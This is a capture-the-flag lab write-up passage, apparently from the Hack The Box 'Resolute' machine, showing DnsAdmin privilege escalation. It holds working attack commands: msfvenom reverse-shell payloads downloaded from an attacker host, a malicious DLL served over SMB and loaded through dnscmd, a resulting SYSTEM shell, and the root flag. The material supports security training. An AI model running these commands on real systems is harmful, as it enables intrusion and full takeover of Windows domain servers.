*Evil-WinRM* PS C:\Users\ryan\Music\master\DNSAdmin-DLL-master\DNSAdmin-DLL> C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10.0.14393.0_none_000422d4a08d9f88\cl.exe /EHsc dllmain.cpp
Program 'cl.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Oh well... I tried compiling the application on the victim, but with no success.
MSF: DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl 10.10.14.99/rev.exe -outfile rev.exe
---
└─$ msfconsole -q
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > run
---
*Evil-WinRM* PS C:\Users\ryan\Music> .\rev.exe
winpeas reported that AV was not found, but the file kept getting deleted... It doesn't make sense, because winpeas should also have been removed.
It turns out we don't need to compile the previous project; we can use msf (hopefully): https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/privilege-escalation/dnsadmin
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f dll -o rev.dll
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl 10.10.14.99/rev.dll -outfile rev.dll
The binary still gets deleted, but we can try loading the DLL from an SMB share instead.
└─$ impacket-smbserver -smb2support letmein ./www
---
# Change port on MSF
[-] run: Interrupted
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
---
*Evil-WinRM* PS C:\Users\ryan\Music> dnscmd.exe Resolute /config /serverlevelplugindll \\10.10.14.99\letmein\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Music> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Music> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3720
FLAGS :
---
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3380 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd /Users
cd /Users
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 0000005D D1AC:5AF6
C:.
+---Contacts
+---Desktop
| root.txt
|
+---Documents
| | revert.ps1
| | subinacl.exe
| | users.txt
| |
| \---WindowsPowerShell
| \---Scripts
| \---InstalledScriptInfos
+---Downloads
| Autologon.exe
|
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
Root.txt
C:\Users\Administrator>type Desktop\root.txt
d4472a024536ff154097aab3d8312f42